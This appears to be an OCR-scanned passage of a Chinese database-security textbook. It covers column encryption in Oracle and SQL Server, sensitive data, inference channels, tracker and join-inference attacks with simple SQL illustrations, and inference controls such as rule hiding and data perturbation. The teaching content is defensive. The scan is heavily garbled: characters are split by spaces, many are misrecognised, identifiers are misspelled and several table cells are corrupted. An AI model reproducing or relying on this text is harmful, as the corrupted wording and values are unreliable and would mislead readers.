适应 数据 库 系统 的 特性 ,是 既 可 加 密 又 可 解密 的 可 逆 过 程 。 但 是 索引 字段 .关系 运算 的 比较 
字段 . 表 间 的 连接 码 字 段 是 不 能 加 密 的 。 

数据 库 加 密 无 法 实现 对 数据 制约 因素 的 定义 ,失去 密 文 数据 的 排序 、 分 组 和 分 类 作用 ， 
SQL 语言 将 对 加 密 数据 失去 作用 ,应 用 开发 使 用 受到 一 定 的 限制 。 

DBMS 内 核 层 加 密 是 调用 数据 库 内 嵌 的 加 密 引 擎 对 数据 元 素 进行 加 密 , 如 图 9.4 所 示 ， 
数据 库 内 核 加 密 采 用 多 密 钥 机 制 。 

DBMS 外 层 加 密 是 调用 DBMS 外 部 加 密 工 具 或 应 用 程序 先 对 数据 元 素 进行 加 密 ,再 利 
用 DBMS 系统 存储 数据 库 , 输 出 后 才能 解密 ,如 图 9.5 所 示 。 


| 


定义 加 密 要 求 工具 | | 
| 定义 加 密 工 具 数据 库 
窜 吉 “= 一 一 一 | 应 用 系统 
DBMS | 一 一 数据 库 应 用 系统 ] eid 


1 
加 密 器 DBMS 


图 9.4 DBMS 内 核 层 加 密 关系 图 9.5 DBMS 外 层 加 密 关系 
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加 解密 处 理 模 块 是 数据 库 加 密 引 擎 的 核心 模块 。 包 括 数据 库 加 解密 引擎 的 初始 化 、 内 
部 专用 命令 的 处 理 加 密 字典 信息 检索 、 加 密 字 典 缓冲 区 的 管理 .SQL 命令 的 加 密 变 换 、 查 询 
结果 的 解密 处 理 及 加 解密 算法 实现 等 功能 子 模块 , 男 外 还 包括 一 些 公用 的 辅助 函数 。 数 据 
库 加 /解密 引擎 系统 结构 如 图 9.6 所 示 。 


用 户 应 用 程序 
SQLLink 
用 户 UserLink 加 /解密 
接口 模块 处 理 模块 
UserLink | fen 
数据 库 
接口 模块 
SQLLink 
| | SQLLink 
数据 库 接口 


图 9.6 数据 库 加 /解密 引擎 


数据 库 接口 模块 是 将 所 有 访问 数据 库 的 操作 封装 在 一 起 ,访问 后 台数 据 库 的 接口 函数 。 

数据 库 中 的 数据 加 密 主要 是 DBMS 针对 数据 库 中 表 的 列 进行 加 密 。 相 对 应 用 程序 加 
密 的 优点 是 减轻 了 程序 的 复杂 性 ,避免 了 加 密 策 略 的 修改 导致 所 有 相关 应 用 程序 的 更 新 。 

Oracle 数据 库 10g 第 2 版 对 隐私 提供 了 相应 的 加 密 措施 一 一 透明 数据 加 密 (TDE) ,可 
以 随时 地 对 表 中 的 一 列 或 多 列 进行 加 密 。 只 需 将 列 定义 为 加 密 形式 即 可 ,不 用 编写 代码 。 
下 面 是 一 个 对 列 进行 加 密 的 例子 。 

create table accounts (id number not null, firstname varchar2 (20)not null, 

lastname varchar2 (20) not null, 

ssn varchar2 (9) ENCRYPT USING "AES128", 


type varchar2 (1) not null, 
folio id number ENCRYPT USING 'AES128',addr varchar2 (40) ) 


在 创建 表 accounts 时 ,在 列 ssn 和 folio_id 上 使 用 了 TDE, 而 且 使 用 的 是 128 位 的 高 级 
加 密 标 准 , 这 两 列 的 数据 将 以 加 密 方式 存储 在 表 里 面 ,查询 时 以 明文 呈现 数据 ,检索 过 程 完 
成 了 解密 。 

SQL Server 2005 将 数据 加 密 作为 数据 库 的 内 在 特性 ,提供 丰富 的 加 密 算法 和 多 层次 
的 密 钥 管理 。 它 所 包括 的 加 密 算法 有 : 

(1) 对 称 式 加 密 。 支 持 RC4、RC2、DEC 和 AES 系列 加 密 算法 。 

(2) 非 对 称 密 钥 加 密 。 支 持 RSA 加 密 算 法 以 及 512 位 、1024 位 和 2048 位 的 密 钥 强 度 。 

(3) 数字 证 书 。 支 持 (IETF)X. 509 版 本 3(x. 509v3) 规 范 ,一 个 组 织 可 以 对 SQL 
Server 2005 使 用 外 部 生成 的 证 书 , 或 者 可 以 使 用 SQL Server 2005 生成 证 书 。 

SQL Server 2005 采用 多 级 密 钥 来 保护 它 内 部 的 密 钥 和 数据 。 所 有 服务 主 密 钥 
(Service Master Key) 保 护 数据 库 主 密 钥 (Database Master Keys) ,而 数据 库 主 密 钥 又 保护 
证 书 (Certificates) 和 非 对 称 密 钥 (Asymmetric Keys) ,最 底层 的 对 称 性 密 钥 (CSymmetric 
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Keys) 受 证 书 、 非 对 称 密 钥 或 其 他 对 称 性 密 钥 保 护 。 用 户 只 需 提供 密码 来 保护 这 一 系列 
密 钥 。 


9.4.3 敏感 数据 与 推理 


1. 敏感 数据 

所 谓 敏 感 数据 (Sensitive Data) 就 是 指 不 希望 其 他 用 户 看 见 的 数据 。 人 敏感 数据 应 该 既 
可 以 是 单个 数据 项 ,也 可 以 是 数据 项 的 组 合 ; 既 可 以 是 整个 关系 中 的 所 有 元 组 ,也 可 以 是 满 
足 条 件 的 部 分 元 组 。 

敏感 数据 的 泄露 类 型 形式 包括 查询 数据 的 域 值 范围 否定 结果 和 数据 的 存在 性 。 使 数 
据 敏 感 的 几 个 因素 包括 固有 敏感 性 ,来 自 敏 感 源 .声明 的 敏感 性 、. 归 类 敏感 性 和 已 泄露 相关 
敏感 性 。 

在 实际 中 ,数据 库 中 的 元 素 常 常 是 部 分 而 不 是 全 部 为 敏感 数据 ,而 且 敏 感 的 程度 各 有 不 
同 。 元 素 的 组 合 敏感 性 可 能 高 于 或 低 于 组 成 它 的 任何 一 个 子 元 素 。 为 数据 库 中 的 每 个 数据 
元 素 定义 敏感 级 别 来 统一 刻画 数据 的 敏感 性 。 一 个 元 素 的 安全 等 级 可 能 与 相同 行 或 列 的 其 
他 元 素 不 同 ,如 表 9.4 所 示 。 


表 9.4 敏感 数据 元 素 (阴影 部 分 ,下 同 ) 


名 字 部 门 薪水 电话 职位 
Rogers 者 训 43 800 4-5067 A2 
Jenkins 科研 62 900 6-4287 D4 
Poling 刘 训 38 200 4-4501 Bl 
Garland 客服 54 600 6-6600 A4 
Hilten 客服 44 500 4-5351 Bl 
Davis 管理 51 400 4-9505 A3 


确定 一 个 数据 是 否 是 敏感 数据 以 及 怎样 保护 这 些 敏感 数据 是 十 分 困难 的 。 保 守 的 观点 
建议 拒绝 一 切 敏感 域 的 查询 。 保 护 机 密 性 的 同时 ,可 能 牺牲 了 精确 性 ,加 强 机 密 性 也 导致 了 
不 知道 的 宛 余 。 

2. 数据 库 统计 推理 

在 数据 库 中 可 能 通过 读 其 他 元 素 的 值 而 推 知 另 一 个 元 素 的 值 。 从 已 获得 的 数据 值 推断 
更 多 的 值 称 为 推理 (Inference) 。 

数据 库 推理 表示 用 户 通过 合谋 .拼凑 等 方式 ,从 合法 获得 的 低 安全 等 级 信息 及 数据 中 推 
导出 受 高 安全 等 级 保护 的 内 容 , 或 估计 其 准确 程度 。 常 见 推 理 规则 包括 一 阶 谓词 逻辑 .统计 
规律 . 非 单调 性 和 知识 关联 。 

推理 问题 最 早 由 Dorothy. Denning 等 在 统计 数据 库 中 提出 ,并 采用 了 格子 模型 。 最 典 
型 的 例子 是 统计 某 一 区 域 人 群 的 平均 收入 时 保护 个 人 的 收入 信息 。 

假设 表格 由 雇员 记录 (性 别 , 系 ,等 级 ,学 位 ,工龄 ,工资 ) 组 成 ,统计 由 记录 子 集 公 共 属 性 
计算 获得 。 计 算 公 式 表示 为 下 ,通常 由 各 种 数学 逻辑 使 用 OR( 十 )\AND( 必 ) NOT( 一 ) 构 
成 。 例 如 ,下 一 (学 位 =MS)&[( 等 级 =5) 十 (等 级 =6)]。 满 足下 计算 的 记录 集合 称 为 下 的 
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查询 集 。 查 询 集中 涉及 属性 个 数 决定 了 集合 的 度 , 如 果 有 m 个 不 同属 性 ,查询 集 为 m- 集 。 
上 面 例子 的 查询 集 是 2- 集 。 给 定 m 个 不 同属 性 ,由 这 些 属性 所 有 组 合 产生 的 统计 称 为 
m- 表 。m 个 属性 上 的 下 计算 实际 上 是 mm- 表 中 某 些 %- 集 的 联合 ,每 次 新 的 计算 都 会 添加 一 
个 mm- 集 。 因 此 ,经 过 若干 轮 的 计算 后 ,必定 会 泄露 m- 表 中 的 敏感 数据 。 

给 定 统计 函数 ,所 有 表 的 集合 将 形成 格子 结构 (Lattice Structures)。 

统计 数据 库 推理 控制 问题 与 数据 仓库 .机 器 学 习 、 数 据 挖掘 ,数据 隐私 密切 相关 。 尽 管 
研究 很 早 , 但 仍然 是 较 新 的 研究 领域 。 

3. 推理 通道 

推理 通道 (Inference Channel) 是 从 给 定数 据 集 和 访问 规则 推理 出 未 知 的 .有 用 的 数据 
集 或 关系 的 途径 。 推 理 通道 是 通过 访问 非 敏感 信息 或 元 数据 而 泄露 敏感 信息 的 关键 ,主要 
有 演绎 型 .推导 型 和 概率 型 三 类 。 

推理 通道 问题 是 数据 库 安全 的 难点 , 它 与 数据 库 具 体 实现 有 关 , 主 要 包括 推理 通道 的 检 
测 和 消除 ,是 数据 库 设计 人 员 和 用 户 需要 共同 关心 的 问题 。 在 有 效 控制 推理 通道 之 前 ,用 户 
必须 完全 了 解数 据 模型 及 其 存储 、 使 用 模式 。 

很 多 推理 通道 是 将 已 经 获取 的 数据 和 存储 管理 元 数据 结合 起 来 引发 的 ,包括 完整 性 约 
束 、 函 数 与 多 值 依赖 . 取 值 约束 、 分 级 约束 等 。 

1) 实体 完整 性 约束 

实体 完整 性 约束 要 求 关 系 中 的 每 个 元 组 具有 一 个 非 空 并 且 唯 一 的 主 码 。 当 插入 相同 主 
码 的 元 组 时 ,可 能 导致 DBMS 通知 用 户 该 元 组 已 经 存在 ,就 产生 了 推理 通道 ,用 户 可 以 推理 
出 数据 中 存在 某 个 主 码 。 通 常 通过 多 实例 元 组 来 解决 。 

2) 函数 与 多 值 依赖 

关系 数据 模型 各 属性 之 间 存 在 函数 依赖 与 多 值 依赖 关系 ,会 形成 推理 通道 。 

例 1: 关系 R(NAME, RANK,SALARY) 中 具有 相同 RANK 的 员工 具有 相同 的 
SALARY ,因此 ,关系 R 存在 函数 依赖 RANK->SALARY。 假 设 NAME 和 RANK 公开 ， 
SALARY 为 机 密级 。 然 而 ,一 个 公开 用 户 可 以 通过 RANK 以 及 RANK 与 SALARY 之 间 
的 对 应 关系 推理 出 属于 机 密级 的 SALARY 数据 信息 。 

例 2: 关系 R (ID,G1,G2,…,GAR,GPA) ,其 中 ID 表示 学 生 号 码 ,Gi(1<i<k) 表 示 第 i 
门 课程 的 成 绩 ,GPA 表示 学 分 和 。 显 然 ,关系 人 存在 函数 依赖 G1G2…Gk 一 GPA。 假 设 除 
GPA 为 机 密 外 ,其 余 信息 都 公开 。 一 个 公开 级 用 户 可 以 通过 获取 ID,G1,G2,… ,Gm 推导 
出 属于 机 密 的 GPA 数据 信息 。 

解决 这 类 推理 通道 的 方法 是 提升 某 些 数据 的 安全 等 级 ,确保 属性 的 安全 等 级 和 与 它 相 
关 的 函数 依赖 和 多 值 依赖 一 致 。 可 以 证 明 ,在 减少 信息 损失 的 前 提 下 消除 函数 依赖 形式 的 
推理 通道 是 一 个 NP 完全 问题 。 

3) 取 值 约束 

约束 作用 于 一 个 或 多 个 数据 元 素 , 当 设计 的 元 素 跨越 多 个 安全 等 级 时 , 取 值 约束 会 形成 
推理 通道 。 

例如 R(A,B) 中 B 为 敏感 属性 , 当 取 值 约束 A 十 B20 时 ,B 的 取 值 影响 A 的 取 值 集 
合 , 产 生 推理 通道 。 

消除 这 类 通道 是 分 解 这 类 约束 ,使 公开 属性 与 敏感 属性 有 单独 的 约束 。 
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4) 分 级 约束 

分 级 约束 就 是 描述 数据 分 级 准则 的 规则 ,公开 的 分 级 约束 形成 推理 通道 ,可 以 从 中 推导 
出 敏感 数据 。 

消除 这 类 通道 是 采取 严厉 的 策略 ,敏感 数据 所 在 元 组 拒绝 这 类 查询 响应 。 

4. 推理 攻击 

推理 (Inference) 是 一 种 通过 非 敏 感 数 据 推断 或 推导 敏感 数据 的 方法 。 推 理 问 题 是 数据 
库 安 全 中 一 个 很 微妙 的 弱点 。 如 表 9. 5 中 的 数据 库 ,假定 阴影 区 都 是 敏感 域 ,但 这 些 域 只 有 


和 固定 个 体 关联 后 才 是 敏感 的 。 
表 9.5 敏感 属性 
姓名 性 别 助学金 种 族 吸毒 次 数 | 处 罚 次 数 究 室 
Adams M 5000 C 1 45 Holmes 
Bailey M 0 B 0 0 Grey 
Chin F 3000 A 0 20 West 
Dewitt M 1000 B 六 35 Grey 
Earhart F 2000 C 1 95 Holmes 
Fein F 1000 C 0 15 West 
Groff M 4000 C 3 0 West 
Hill F 5000 B 2 10 Holmes 
Koch F 0 C 0 West 
Liu 下 0 A 2 10 Grey 
Majors M 2000 C 必 0 Grey 
1) 直接 攻击 


直接 攻击 是 指 用 户 试图 通过 直接 查询 敏感 域 ,根据 产生 的 少量 记录 决定 敏感 域 的 值 。 
最 成 功 的 技术 是 形成 一 个 与 数据 项 精确 匹配 的 查询 。 

2) 间接 攻击 

间接 攻击 是 根据 一 个 或 多 个 中 间 的 统计 值 推理 最 后 结果 。 这 种 方法 要 求 做 一 些 数据 库 
之 外 的 工作 。 特 别 是 统计 间接 攻击 需要 利用 某 些 有 明显 统计 特征 的 方法 来 推理 单个 数据 。 
利用 统计 数据 项 的 和 、 计 数 , 平 均值 .中 值 进 行 推理 。 

3) 追踪 攻击 

追踪 攻击 (Tracker Attack) 通 过 使 用 额外 的 、 产 生 更 少 结果 的 查询 欺骗 数据 库 管理 器 ， 
从 而 找到 想 要 的 数据 。 例 如 追踪 者 进行 两 次 查询 ,让 一 次 查询 结果 与 男 一 次 查询 结果 相 比 
增加 了 一 些 记 录 ; 去 掉 两 组 记录 中 的 相同 部 分 ,就 只 留 下 统计 数据 或 想 要 的 数据 。 

例如 , 表 9.6 是 一 张 工资 统计 表 STAT ,各 列 依次 表示 姓名 性别、 职业 以 及 工资 。 由 于 男 
性 的 职业 只 有 两 种 且 manager 只 有 一 个 值 ,因此 经 理 李 四 的 工资 可 从 统计 数据 推断 出 来 。 
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表 9.6 工资 统计 表 
NAME SEX OCCUPATION SALARY( * 1000) 
万 一 M programmer 4.8 
燕 二 F teacher 4.6 
张 三 F secretay 4.5 
李 四 M manager 
王 五 M programmer 4.3 
陈 六 M programmer bE 


首先 查询 所 有 性 别 为 M 的 员工 工资 总 和 。 

SELECT SUM (SALARY) FROM STRT WHERE SEX= 'M'; 

再 查询 所 有 “程序 员 ” 的 员工 工资 总 和 。 

SELECT SUM (SALARY) FROM STAT WHERE OCCUPATION= 'progranmer"; 


最 后 把 两 个 查询 的 结果 相 减 就 得 到 了 李 四 的 工资 。 

使 用 逻辑 与 代数 知识 ,加 上 数据 库 内 容 在 分 布 上 的 特点 ,可 以 确定 一 系列 查询 ,这 些 返 
回 结果 与 几 个 不 同 的 集 相关 ,可 以 解 出 各 个 值 。 

4) 组 合 查询 攻击 一 一 连接 推理 

用 户 可 以 采用 一 系列 精心 设计 的 查询 序列 进行 数据 库 推理 。 查 询 序列 表示 为 ql， 
q2,…,qn, 后 续 查 询 可 以 使 用 先前 查询 的 响应 。 

假设 安全 等 级 建立 在 关系 之 上 , 低 等 级 关系 为 EP(EMP_NAME, PRJ_NAME) ,高 等 
级 关系 为 PT(PRJ_NAME,PRJ_TYPE)。EP 的 主 码 为 EMP_NAME,PT 的 主 码 为 PRJ 
NAME。 组合 查询 推理 可 以 通过 下 面 例子 说 明 。 

假设 低 等 级 用 户 执行 如 下 的 SQL 查询 : 

SELECT EP.EMP NAME FROM EP, PT WHERE EP.PRJ NAME= PT.PRJ NAME; 

如 果 将 EP 和 PT 在 PRJ_NAME 上 建立 自然 连接 ,然后 沿 EMP_NAME 进行 投影 ,就 


存在 推理 通道 。 尽 管 查 询 输出 为 低 等 级 ,但 用 户 可 以 推理 获得 PT 关系 中 有 关 PT. PRJ_ 
NAME 的 信息 。 低 等 级 用 户 可 以 进一步 通过 下 面 查询 推理 PT 中 的 全 部 机 密 信息 。 


SELECT EP.EMP NAME FROM EP, PT 
WHERE EP.PRJ NAME= PT.PRJ NAME AND PT.PRJ TYPE= "SDI"; 


尽管 返回 数据 的 安全 等 级 很 低 , 但 处 理 查询 过 程 中 需要 使 用 高 安全 等 级 的 数据 。 因 此 ， 
当 查 询 条 件 涉及 用 户 不 可 见 的 机 密 数 据 时 会 产生 推理 通道 。 

5) 聚集 

聚集 (Aggregation) 意 味 着 从 较 低 敏感 性 的 输入 构造 出 敏感 数据 , 它 与 推理 问题 相关 。 
解决 聚集 问题 很 困难 ,因为 它 要 求 数 据 库 管 理 系统 追踪 每 个 用 户 获 得 了 哪些 数据 ,以 便 回 避 
一 些 可 以 让 用 户 推导 出 更 多 敏感 信息 的 数据 。 对 聚集 计算 尤其 困难 ,因为 聚集 是 在 系统 外 
发 生 的 。 几 乎 没有 什么 方法 提出 来 阻止 聚集 攻击 。 
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5. 推理 控制 

一 个 函数 依赖 对 于 低 安全 级 别 的 用 户 而 言 是 已 经 知道 的 , 则 会 产生 推理 问题 。 通 过 消 
除 函 数 依赖 和 多 值 依赖 推理 的 形式 化 算法 解决 。 

防止 推理 攻击 的 方法 有 查询 控制 或 单项 值 控制 .限制 推理 。 很 难 确定 一 个 查询 是 否 会 
揭露 敏感 数据 ,因此 查询 控制 主要 对 直接 攻击 有 效 。 对 数据 项 的 控制 包括 禁止 查询 和 隐藏 。 
禁止 查询 方式 就 是 对 敏感 数据 的 查询 以 不 响应 的 方式 拒绝 ,隐藏 方式 就 是 提供 接近 或 模糊 
的 结果 值 。 限 制 推理 意味 着 要 禁止 一 些 特定 的 路 径 来 阻止 可 能 的 推理 ,但 也 限制 了 某 些 用 
户 的 正常 查询 ,降低 了 DBMS 的 性 能 。 当 前 推理 通道 控制 问题 的 缺陷 就 是 假设 所 有 已 知 敏 
感 信息 都 来 自 同一 个 数据 库 。 

1) 关联 规则 的 隐藏 

所 谓 受 限 关联 规则 (Restrictive Association Rule) 就 是 指 不 希望 通过 挖掘 技术 被 发 现 
的 规则 集合 ,与 受 限 关联 规则 相关 的 事务 称 为 敏感 事务 (Sensitive Transaction) ,敏感 事务 
中 与 受 限 关联 规则 相关 的 项 称 为 敏感 项 (Victim Item)。 关 联 规则 隐藏 的 目的 就 是 保护 受 
限 关联 规则 不 被 发 现 ,同时 其 他 非 受 限 关联 规则 受到 最 低 限 度 的 影响 。 

隐藏 受 限 关联 规则 ,首先 要 发 现 数据 库 中 与 受 限 关联 规则 相关 的 敏感 事务 ,然后 再 从 中 
选择 敏感 事务 项 。 

关联 规则 的 支持 度 是 在 数据 库 事务 集 D 中 事务 同时 包含 X、Y 的 百分比 , 即 概率 P(X 
UY); 置 信和 度 是 包含 X 的 事务 中 同时 又 包含 Y 的 百分比 , 即 概率 P(Y1X)。 关 联 规则 挖掘 
就 是 从 数据 集中 挖掘 出 X= 二 Y 的 规则 集 。 

防止 关联 规则 挖掘 的 策略 包括 对 数据 库 模糊 处 理 ,或 者 释放 数据 样本 来 控制 对 数据 的 
访问 ,或 者 降低 给 定 规则 或 规则 集 的 重要 性 ,同时 尽 可 能 地 不 对 其 他 规则 的 重要 性 造成 
影响 。 

数据 清洗 通过 对 事务 数据 项 集 的 修改 使 给 定 关联 规则 的 支持 度 和 置信 度 低 于 给 定 的 阔 
值 ,从 而 使 给 定 的 关联 规则 得 到 隐藏 。 但 是 在 对 原始 数据 库 中 的 数据 进行 清洗 之 后 ,可 能 会 
产生 以 下 两 个 问题 : 丢失 规则 和 产生 新 的 规则 。 

关联 规则 隐藏 的 方法 , 按 清洗 对 象 的 不 同 ,一 般 可 以 归纳 为 两 种 ， 

(1) 数据 共享 策略 。 对 原始 数据 本 身 进行 修改 ,包括 对 涉及 受 限 关 联 规 则 的 事务 进行 
移出 操作 ,或 对 事务 中 的 项 直接 删除 、 添 加 或 修改 ,然后 把 清洗 后 的 安全 数据 共享 。 包括 基 
于 项 的 约束 、 添 加 、 转 换 和 模糊 。 

(2) 模式 共享 策略 。 对 所 挖掘 到 的 关联 规则 集 进 行 相关 清洗 后 再 共享 。 

把 数据 库 中 的 规则 项 集 表 示 成 一 个 有 向 图 ,然后 在 有 向 图 中 进行 遍历 和 删 减 。 不 直接 
修改 原始 数据 ,而 是 修改 挖掘 产生 的 模式 ,对 模式 进行 清洗 后 再 共享 。 

4 种 数据 共享 策略 如 下 : 

Q 基于 项 的 约束 。 从 一 组 涉及 受 限 关联 规则 集 的 事务 中 移出 部 分 项 集 ,从 而 使 得 受 限 
关联 规则 的 支持 度 或 置信 和 度 低 于 安全 国 值 的 要 求 , 其 具体 过 程 为 : 

首先 ,检测 数据 库 中 的 每 一 个 事务 ,对 敏感 事务 进行 标注 ;其 次 ,选择 敏感 事务 中 与 受 限 
关联 规则 相关 的 项 ,根据 预先 设 定 的 阔 值 ,决定 是 否 对 这 些 项 进行 隐藏 。 

隐藏 关联 规则 的 核心 思想 是 如 果 要 隐藏 关联 规则 X= 二 Y ,就 要 提高 X 的 支持 度 ,或 者 
降低 XUY 的 支持 度 。 
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@ 基于 项 的 添加 。 针 对 某 些 事务 添加 一 些 无 关 项 ,造成 原始 事务 数据 库 已 有 信息 的 修 
改 , 容 易 造 成 规则 的 新 生 。 这 些 无 关 项 通常 称 为 噪音 ,在 得 到 反馈 结果 时 需要 适量 地 排除 品 
音 的 影响 。 品 音 会 降低 结果 的 精确 性 ,在 对 数据 结果 要 求 不 高 时 可 以 采用 。 

@ 基于 项 的 转换 。 对 原始 事务 中 的 数据 项 进行 转换 ,要 求 转换 后 数据 语义 完整 .数据 
内 的 统计 表 完 整 。 

如 表 9.7 所 示 是 某 医院 信息 系统 数据 库 中 病例 表 的 元 数据 ,如 果 直 接 呈 现在 数据 挖掘 
者 面前 ,那么 很 容易 暴露 病人 的 隐私 信息 ,所 以 对 表 的 属性 名 进行 转换 。 


表 9.7 病例 表 的 元 数据 的 转换 


属性 号 旧 属 性 名 新 属性 名 
1 病人 编号 00010 
2 性 别 00020 
3 年 龄 00030 
4 发 热 体温 00040 
5 淋巴 细胞 数 00050 


除了 对 属性 名 保护 之 外 ,对 属性 值 也 要 通过 转换 方法 进行 保护 ,这 样 保留 了 关联 规则 ， 
但 是 隐藏 了 关联 规则 和 项 的 语义 ,如 表 9.8 所 示 。 
表 9.8 属性 值 转换 规则 


属性 属性 值 表示 新 届 性 值 表示 
性 别 F 或 M 0 或 1 
年 龄 0 一 100 之 间 的 整数 在 原 值 上 乘 2 再 加 100 
发 热 体 温 一 位 小 数 在 原 值 上 乘 10 再 加 2 


@ 基于 项 的 模糊 。 对 一 些 包含 敏感 规则 的 事务 中 的 数据 项 做 未 知 标记 ( 变 成 
unknown) 而 不 是 删除 事务 ,这 样 一 些 已 知 项 值 就 变 成 未 知 的 ,相应 降低 了 规则 的 支持 度 和 
置信 和 度 ,从 而 减少 了 敏感 规则 的 泄露 。 

2) 多 实例 方法 

多 实例 允许 数据 库 中 存在 关键 字 相 同 但 安全 级 别 不 同 的 元 组 , 即 把 安全 级 别 作 为 主 关 
键 字 的 一 部 分 。 缺 点 是 使 数据 库 失 去 了 实体 完整 性 ,同时 增加 了 数据 库 中 数据 关系 的 复 

3) 查询 限制 方法 

(1) 修改 查询 语句 。 当 查询 会 导致 敏感 信息 的 推理 时 ,对 查询 进行 转换 ,自动 添加 约束 
条 件 , 使 其 不 能 导致 敏感 信息 的 导出 。 

(2) 修改 查询 结果 。 对 敏感 数据 用 UNKNOWN 或 其 他 符号 输出 查询 结果 ,防止 恶意 
用 户 可 以 通过 比较 合法 查询 与 非法 查询 的 区 别 导出 推理 信息 。 

消除 这 类 推理 通道 并 不 难 ,系统 可 以 修改 用 户 查询 使 它 只 涉及 授权 数据 ,或 者 干脆 中 止 
有 关 查 询 。 
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4) 统计 推理 控制 

统计 表 的 线性 关系 是 造成 推理 通道 最 为 主要 的 原因 。 统 计数 据 库 的 推理 控制 有 两 种 方 
式 : 限制 (Restriction) 和 干扰 (Perturbation)。 限 制 就 是 通过 抑制 非 敏 感 数 据 控制 推理 , 干 
扰 则 是 向 统计 数据 添加 随机 噪声 。 

限制 可 以 作用 于 元 素 或 者 表 , 又 分 为 无 记忆 限制 .审计 限制 和 预先 限制 几 种 方法 。 干扰 
控制 有 偏差 和 一 致 性 两 个 因素 。 偏 差 (Bias) 是 真实 统计 值 与 干扰 值 之 间 的 差异 ,应 该 等 于 
零 或 者 尽 可 能 地 小 。 一 致 性 指 重复 相同 的 查询 应 该 产生 相同 的 干扰 结果 并 且 没 有 语义 
问题 。 

统计 推理 的 控制 取决 于 一 种 常见 的 准则 : n 项 k% 的 敏感 数据 规则 。 如 果 个 记录 (或 
者 更 少 ) 构 成 的 信息 量 超过 了 全 部 信息 量 的 &%, 则 至 少 需要 定义 一 个 敏感 数据 。n 和 是 
数据 库 的 重要 参数 ,通常 应 该 保密 。 值 得 注意 的 是 ,尺寸 为 1 的 查询 集 所 涉及 的 数据 都 是 敏 
感 的 。 实 际 上 尺寸 为 2 的 分 组 统计 计算 也 是 敏感 的 ,用 户 很 容易 进行 推理 。 防 止 推理 泄露 
风险 的 一 种 办 法 是 为 数据 表 指 定 一 定数 目的 敏感 元 。 

统计 数据 库 的 推理 控制 具有 三 个 判断 因素 : 安全 ,信息 损失 和 代价 。 安 全 取决 于 可 以 
突破 控制 推理 获得 数据 的 相对 数目 及 其 难度 。 信 息 损失 取决 于 控制 中 不 必要 受 限 制 的 非 敏 
感 信 息 ,或 者 引入 的 噪声 。 代 价 取决 于 一 些 基本 的 实现 需求 ,包括 预先 推理 ,查询 处 理 开销 
等 。 控 制 措施 如 下 : 

(1) 有 限 响应 禁止 。 根 据 项 k% 的 规则 ,不 显示 所 占有 百分比 过 大 的 元 素 。 在 样本 数 
据 很 少 的 表 中 ,除了 总 数 单元 外 所 有 的 单元 都 不 得 不 禁止 查询 。 没 有 提供 总 数 , 则 可 只 禁止 
其 中 一 个 单元 。 

(2) 组 合 结果 。 一 种 控制 方法 是 组 合 行 或 列 以 保护 敏感 数据 。 例 如 对 某 敏 感 数据 项 的 
值 两 个 或 三 个 进行 组 合 统计 来 抑制 推理 和 泄露 。 或 者 显示 一 个 结果 的 范围 。 例 如 ,发 布 助 
学 金 的 结果 时 ,给 出 金额 的 范围 0 一 1999 美元 ,2000 一 3999 美元 ,以 及 4000 美元 以 上 。 

(3) 随机 样本 。 使 用 随机 样本 控制 方法 ,查询 结果 不 是 直接 从 整个 数据 库 获 得 ,而 是 从 
数据 库 的 随机 样本 上 计算 出 来 的 。 通 过 重复 相同 的 查询 可 以 进行 平均 数 攻击 。 为 了 防止 这 
种 攻击 ,相同 的 查询 应 该 选择 相同 的 样本 。 

(4) 随机 数据 扰乱 。 用 一 个 小 错误 扰乱 数据 库 的 值 。Xi 是 数据 库 中 数据 项 i 的 真实 
值 ,用 随机 数据 6 附加 在 Xi 上 作为 统计 结果 ,这 样 计算 和 平均 值 的 结果 接近 真实 值 但 不 是 
精确 值 。 为 了 使 相同 的 查询 产生 的 结果 一 致 ,必须 保存 所 有 « 值 。 由 于 存储 该 值 很 容易 , 因 
此 数据 扰乱 比 随机 样本 选择 更 容易 使 用 。 

(5) 查询 分 析 。 更 复杂 的 安全 形式 是 查询 分 析 。 这 个 方法 要 求 维 护 每 个 用 户 过 去 的 查 
询 ,根据 过 去 查询 的 结果 判断 这 个 查询 可 能 推理 出 的 结果 。 


9.4.4 敏感 数据 保护 


保护 敏感 数据 元 素 的 方法 是 首先 定义 访问 限制 ,其 次 保证 元 素 值 不 会 被 未 授权 改变 。 
这 两 个 要 求 都 涉及 机 密 性 和 完整 性 。 成 功 的 安全 策略 必须 能 够 同时 防止 直接 和 间接 泄露 敏 
感 数 据 。 隐 藏 敏感 数据 的 最 直观 方法 就 是 对 敏感 数据 进行 修改 。 

1. 随机 偏 移 量 方法 

R. Agrawal 提出 一 种 通过 加 随机 偏 移 量 来 对 原始 数据 进行 变换 ,从 而 保护 敏感 数据 的 
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方法 ,主要 有 两 种 类 型 的 变换 。 

(1) 归 类 法 (Value-Class Membership) 。 把 数据 分 成 几 个 不 相交 的 类 ,一 般 按 照 等 间 
隔 进 行 划分 。 例 如 ,把 工资 按照 1 万 元 的 间隔 进行 划分 ,第 一 类 ( 低 于 1 万 元 ) ,第 二 类 (1 一 2 
万 元 ) ,第 三 类 (2 一 3 万 元 ) , 依 此 类 推 。 年 龄 也 可 以 按照 10 岁 的 间隔 进行 划分 ,第 一 类 ( 低 
于 10 岁 ) ,第 二 类 (10 一 20 岁 ) ,第 三 类 (20~30 岁 ), 依 此 类 推 。 这 个 范围 可 以 是 连续 的 ,也 
可 以 是 离散 的 ,只 要 各 个 类 不 相交 。 这 种 归 类 法 通常 用 于 隐藏 个 人 信息 。 

(2) 转换 法 (Value Distortion) 。 假 设 原来 的 值 是 z, 那 么 经 过 隐藏 后 就 变 为 + 十 y, 其 
中 y 是 一 个 随机 值 。 也 可 以 使 用 分 布 相 同 的 随机 值 向 量 (y1,y2,… ,yn) 对 原始 数据 值 (x1， 
Xx2,"… ,zn) 进 行 和 变换 。 经 过 处 理 后 的 原始 敏感 数据 被 隐藏 了 。 

2. 相关 模型 方法 

W. L. Du 提出 随机 响应 技术 的 敏感 数据 保护 方法 。 该 方法 的 基本 思想 是 相关 问题 模 
型 和 不 相关 问题 模型 。 比 如 ,为 了 估计 具有 A 特性 的 人 和 群 比例 ,向 一 个 样本 群发 放 与 该 特 
性 相关 的 调查 问卷 ,由 于 A 特性 涉及 敏感 数据 ,因此 被 调查 人 群 可 能 拒绝 回答 ,或 回答 一 个 
不 正确 的 答案 。 在 该 模型 中 ,不 是 直接 问 被 调查 者 是 否 具有 A 特性 ,而 是 问 调查 者 两 个 相 
关 的 问题 ,该 问题 的 答案 截然 相反 ,例如 具有 A 特性 或 不 具有 A 特性 。 

